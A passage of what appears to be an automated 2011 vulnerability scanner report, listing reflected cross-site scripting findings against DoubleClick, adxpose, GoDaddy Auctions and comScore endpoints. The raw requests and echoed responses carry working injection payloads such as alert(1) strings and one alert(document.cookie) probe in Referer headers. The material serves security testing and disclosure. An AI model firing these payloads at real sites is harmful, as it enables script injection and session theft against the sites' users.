Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7265
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 16 Apr 2011 15:40:05 GMT
Expires: Sat, 16 Apr 2011 15:40:05 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
xhd3llcnMtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctcG9jLWV4YW1wbGUtcmVwb3J0Lmh0bWyYApYGuAIYwAIFyAKUlpIZqAMB6APdBegDyQfoA7oC9QMCAADE&num=1&sig=AGiWqtwRAWa76RcukwEkQc-2T3--rwlfxw&client=ca-pub-4063878933780912&adurl=44f9b"-alert(1)-"e081a0b507fhttp://turbotax.intuit.com/affiliate/bbtretdm");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow =
...[SNIP]...

4.10. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.3 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.3

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75837"-alert(1)-"704dcbf347f was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.3;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBA4fyLepTdTNGtud6Abe4J2CDtT-5fsBlMzB_CX0n4eicQAQARgBIL7O5Q04AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wO6AQk3Mjh4OTBfYXPIAQnaAWBmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3hzcy1kb3JrLWxhd3llcnMtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctcG9jLWV4YW1wbGUtcmVwb3J0Lmh0bWyYApYGuAIYwAIFyAKUlpIZqAMB6APdBegDyQfoA7oC9QMCAADE75837"-alert(1)-"704dcbf347f&num=1&sig=AGiWqtwRAWa76RcukwEkQc-2T3--rwlfxw&client=ca-pub-4063878933780912&adurl=;ord=1349914408? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1302986276&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2FUsers%2Fcrawler%2FDocuments%2Fxss-dork-lawyers-cross-site-scripting-poc-example-report.html&dt=1302968274562&bpp=5&shv=r20110406&jsv=r20110412&correlator=1302968276072&frm=0&adk=1607234649&ga_vid=217450935.1302968278&ga_sid=1302968278&ga_hid=1316019502&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1000&eid=36815001&fu=0&ifi=1&dtd=6355&xpc=7QG1qV76FG&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 16 Apr 2011 15:38:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7283

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
6AQk3Mjh4OTBfYXPIAQnaAWBmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3hzcy1kb3JrLWxhd3llcnMtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctcG9jLWV4YW1wbGUtcmVwb3J0Lmh0bWyYApYGuAIYwAIFyAKUlpIZqAMB6APdBegDyQfoA7oC9QMCAADE75837"-alert(1)-"704dcbf347f&num=1&sig=AGiWqtwRAWa76RcukwEkQc-2T3--rwlfxw&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fturbotax.intuit.com/affiliate/bbtretdm");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wm
...[SNIP]...

4.11. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.3 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.3

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6772"-alert(1)-"80ae9066ab0 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.3;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBA4fyLepTdTNGtud6Abe4J2CDtT-5fsBlMzB_CX0n4eicQAQARgBIL7O5Q04AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wO6AQk3Mjh4OTBfYXPIAQnaAWBmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3hzcy1kb3JrLWxhd3llcnMtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctcG9jLWV4YW1wbGUtcmVwb3J0Lmh0bWyYApYGuAIYwAIFyAKUlpIZqAMB6APdBegDyQfoA7oC9QMCAADE&num=1&sig=AGiWqtwRAWa76RcukwEkQc-2T3--rwlfxw&client=ca-pub-4063878933780912b6772"-alert(1)-"80ae9066ab0&adurl=;ord=1349914408? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1302986276&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2FUsers%2Fcrawler%2FDocuments%2Fxss-dork-lawyers-cross-site-scripting-poc-example-report.html&dt=1302968274562&bpp=5&shv=r20110406&jsv=r20110412&correlator=1302968276072&frm=0&adk=1607234649&ga_vid=217450935.1302968278&ga_sid=1302968278&ga_hid=1316019502&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1000&eid=36815001&fu=0&ifi=1&dtd=6355&xpc=7QG1qV76FG&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 16 Apr 2011 15:39:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7283

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
kb3JrLWxhd3llcnMtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctcG9jLWV4YW1wbGUtcmVwb3J0Lmh0bWyYApYGuAIYwAIFyAKUlpIZqAMB6APdBegDyQfoA7oC9QMCAADE&num=1&sig=AGiWqtwRAWa76RcukwEkQc-2T3--rwlfxw&client=ca-pub-4063878933780912b6772"-alert(1)-"80ae9066ab0&adurl=http%3a%2f%2fturbotax.intuit.com/affiliate/bbtretdm");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var
...[SNIP]...

4.12. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.3 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.3

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62c53"-alert(1)-"9354907b3e was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.3;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBA4fyLepTdTNGtud6Abe4J2CDtT-5fsBlMzB_CX0n4eicQAQARgBIL7O5Q04AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wO6AQk3Mjh4OTBfYXPIAQnaAWBmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3hzcy1kb3JrLWxhd3llcnMtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctcG9jLWV4YW1wbGUtcmVwb3J0Lmh0bWyYApYGuAIYwAIFyAKUlpIZqAMB6APdBegDyQfoA7oC9QMCAADE&num=162c53"-alert(1)-"9354907b3e&sig=AGiWqtwRAWa76RcukwEkQc-2T3--rwlfxw&client=ca-pub-4063878933780912&adurl=;ord=1349914408? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1302986276&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2FUsers%2Fcrawler%2FDocuments%2Fxss-dork-lawyers-cross-site-scripting-poc-example-report.html&dt=1302968274562&bpp=5&shv=r20110406&jsv=r20110412&correlator=1302968276072&frm=0&adk=1607234649&ga_vid=217450935.1302968278&ga_sid=1302968278&ga_hid=1316019502&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1000&eid=36815001&fu=0&ifi=1&dtd=6355&xpc=7QG1qV76FG&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 16 Apr 2011 15:38:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7279

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
jh4OTBfYXPIAQnaAWBmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3hzcy1kb3JrLWxhd3llcnMtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctcG9jLWV4YW1wbGUtcmVwb3J0Lmh0bWyYApYGuAIYwAIFyAKUlpIZqAMB6APdBegDyQfoA7oC9QMCAADE&num=162c53"-alert(1)-"9354907b3e&sig=AGiWqtwRAWa76RcukwEkQc-2T3--rwlfxw&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fturbotax.intuit.com/affiliate/bbtretdm");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode =
...[SNIP]...

4.13. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.3 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.3

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ee8f"-alert(1)-"cfa1a2cd9c1 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.3;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBA4fyLepTdTNGtud6Abe4J2CDtT-5fsBlMzB_CX0n4eicQAQARgBIL7O5Q04AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wO6AQk3Mjh4OTBfYXPIAQnaAWBmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3hzcy1kb3JrLWxhd3llcnMtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctcG9jLWV4YW1wbGUtcmVwb3J0Lmh0bWyYApYGuAIYwAIFyAKUlpIZqAMB6APdBegDyQfoA7oC9QMCAADE&num=1&sig=AGiWqtwRAWa76RcukwEkQc-2T3--rwlfxw7ee8f"-alert(1)-"cfa1a2cd9c1&client=ca-pub-4063878933780912&adurl=;ord=1349914408? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1302986276&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2FUsers%2Fcrawler%2FDocuments%2Fxss-dork-lawyers-cross-site-scripting-poc-example-report.html&dt=1302968274562&bpp=5&shv=r20110406&jsv=r20110412&correlator=1302968276072&frm=0&adk=1607234649&ga_vid=217450935.1302968278&ga_sid=1302968278&ga_hid=1316019502&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1000&eid=36815001&fu=0&ifi=1&dtd=6355&xpc=7QG1qV76FG&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 16 Apr 2011 15:39:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7283

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
L2NyYXdsZXIvRG9jdW1lbnRzL3hzcy1kb3JrLWxhd3llcnMtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctcG9jLWV4YW1wbGUtcmVwb3J0Lmh0bWyYApYGuAIYwAIFyAKUlpIZqAMB6APdBegDyQfoA7oC9QMCAADE&num=1&sig=AGiWqtwRAWa76RcukwEkQc-2T3--rwlfxw7ee8f"-alert(1)-"cfa1a2cd9c1&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fturbotax.intuit.com/affiliate/bbtretdm");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallows
...[SNIP]...

4.14. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.3 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.3

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40f27"-alert(1)-"12d3ff8d5 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.3;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l40f27"-alert(1)-"12d3ff8d5&ai=BBA4fyLepTdTNGtud6Abe4J2CDtT-5fsBlMzB_CX0n4eicQAQARgBIL7O5Q04AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wO6AQk3Mjh4OTBfYXPIAQnaAWBmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3hzcy1kb3JrLWxhd3llcnMtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctcG9jLWV4YW1wbGUtcmVwb3J0Lmh0bWyYApYGuAIYwAIFyAKUlpIZqAMB6APdBegDyQfoA7oC9QMCAADE&num=1&sig=AGiWqtwRAWa76RcukwEkQc-2T3--rwlfxw&client=ca-pub-4063878933780912&adurl=;ord=1349914408? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1302986276&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2FUsers%2Fcrawler%2FDocuments%2Fxss-dork-lawyers-cross-site-scripting-poc-example-report.html&dt=1302968274562&bpp=5&shv=r20110406&jsv=r20110412&correlator=1302968276072&frm=0&adk=1607234649&ga_vid=217450935.1302968278&ga_sid=1302968278&ga_hid=1316019502&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1000&eid=36815001&fu=0&ifi=1&dtd=6355&xpc=7QG1qV76FG&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 16 Apr 2011 15:38:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7275

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aeb/f/1c2/%2a/e%3B239614143%3B0-0%3B0%3B62445293%3B3454-728/90%3B41577488/41595275/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l40f27"-alert(1)-"12d3ff8d5&ai=BBA4fyLepTdTNGtud6Abe4J2CDtT-5fsBlMzB_CX0n4eicQAQARgBIL7O5Q04AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wO6AQk3Mjh4OTBfYXPIAQnaAWBmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3hzcy1kb3JrLWxhd3llcnMtY3Jvc3Mtc2l0
...[SNIP]...

4.15. http://ads.adxpose.com/ads/ads.js [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload b617a<script>alert(1)</script>d0fbd595a25 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads/ads.js?uid=ZC45X9Axu6NOUFfX_321611b617a<script>alert(1)</script>d0fbd595a25 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/martindale.lawyer.locator.dart/ll_cpm_skyscraper;sz=160x600;ord=3737712935544550400?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0764E8067AD048B1710A67299AA363A4; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Set-Cookie: evlu=c6c75b6e-8553-43d3-8fc7-6ddce47cdd98; Domain=adxpose.com; Expires=Thu, 04-May-2079 17:03:21 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 13:49:13 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...
_LOG_EVENT__("000_000_3",b,j,"",Math.round(Y.left)+","+Math.round(Y.top),O+","+I,C,l,m,v,S,c)}}t=p.inView}}}if(!__ADXPOSE_PREFS__.override){__ADXPOSE_WIDGET_IN_VIEW__("container_ZC45X9Axu6NOUFfX_321611b617a<script>alert(1)</script>d0fbd595a25".replace(/[^\w\d]/g,""),"ZC45X9Axu6NOUFfX_321611b617a<script>
...[SNIP]...

4.16. https://auctions.godaddy.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://auctions.godaddy.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0fc6"%3balert(1)//e92a6e136cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b0fc6";alert(1)//e92a6e136cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?b0fc6"%3balert(1)//e92a6e136cf=1 HTTP/1.1
Host: auctions.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 252812
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=sbhw2g45lra5ew55khjmd0n1; path=/; HttpOnly
Set-Cookie: traffic=cookies=1&referrer=&sitename=auctions.godaddy.com&page=/trpHome.aspx&server=M1PWTDNAMWEB004&status=200 OK&querystring=b0fc6%22%3balert(1)%2f%2fe92a6e136cf=1&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
Date: Sat, 16 Apr 2011 13:57:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   <head id="ctl00_Head1"><tit
...[SNIP]...
<script type="text/javascript">
               function AddMembershipToCart()
               {
                   setCookie("IDPLoginRedirect", "https://auctions.godaddy.com/trpHome.aspx?b0fc6";alert(1)//e92a6e136cf=1");
                   if (document.getElementById("ctl00_cphMaster_tbBidAmount"))
                   { setCookie("IDPBid", document.getElementById("ctl00_cphMaster_tbBidAmount").value); }
                   else if (document.getElementBy
...[SNIP]...

4.17. https://auctions.godaddy.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://auctions.godaddy.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bcc8"><script>alert(1)</script>deeb52d7f31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?7bcc8"><script>alert(1)</script>deeb52d7f31=1 HTTP/1.1
Host: auctions.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 253492
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=yafoqa55zfssbv55lwxafz55; path=/; HttpOnly
Set-Cookie: traffic=cookies=1&referrer=&sitename=auctions.godaddy.com&page=/trpHome.aspx&server=M1PWTDNAMWEB004&status=200 OK&querystring=7bcc8%22%3e%3cscript%3ealert(1)%3c%2fscript%3edeeb52d7f31=1&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
Date: Sat, 16 Apr 2011 13:57:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   <head id="ctl00_Head1"><tit
...[SNIP]...
keyCode = event.keyCode ? event.keyCode : event.which ? event.which : event.charCode; if (keyCode == 13){ RecordClick(event, '22362', '');createFormAndSubmit('https://auctions.godaddy.com/trpHome.aspx?7bcc8"><script>alert(1)</script>deeb52d7f31=1');return false;}" />
...[SNIP]...

4.18. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload ae283<script>alert(1)</script>2c0f2ef6ff was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2ae283<script>alert(1)</script>2c0f2ef6ff&c2=3005693&c3=3&c4=http%3A%2F%2Falltop.com%2F&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://law.alltop.com/widget2fa3b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3c139cf78b0/?type=js
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 23 Apr 2011 13:51:11 GMT
Date: Sat, 16 Apr 2011 13:51:11 GMT
Connection: close
Content-Length: 1252

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
4.19. http://b.scorecardresearch.com/beacon.js [c10 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload b5161<script>alert(1)</script>029ad526e2b was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=3&c4=http%3A%2F%2Falltop.com%2F&c5=&c6=&c10=b5161<script>alert(1)</script>029ad526e2b&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://law.alltop.com/widget2fa3b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3c139cf78b0/?type=js
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
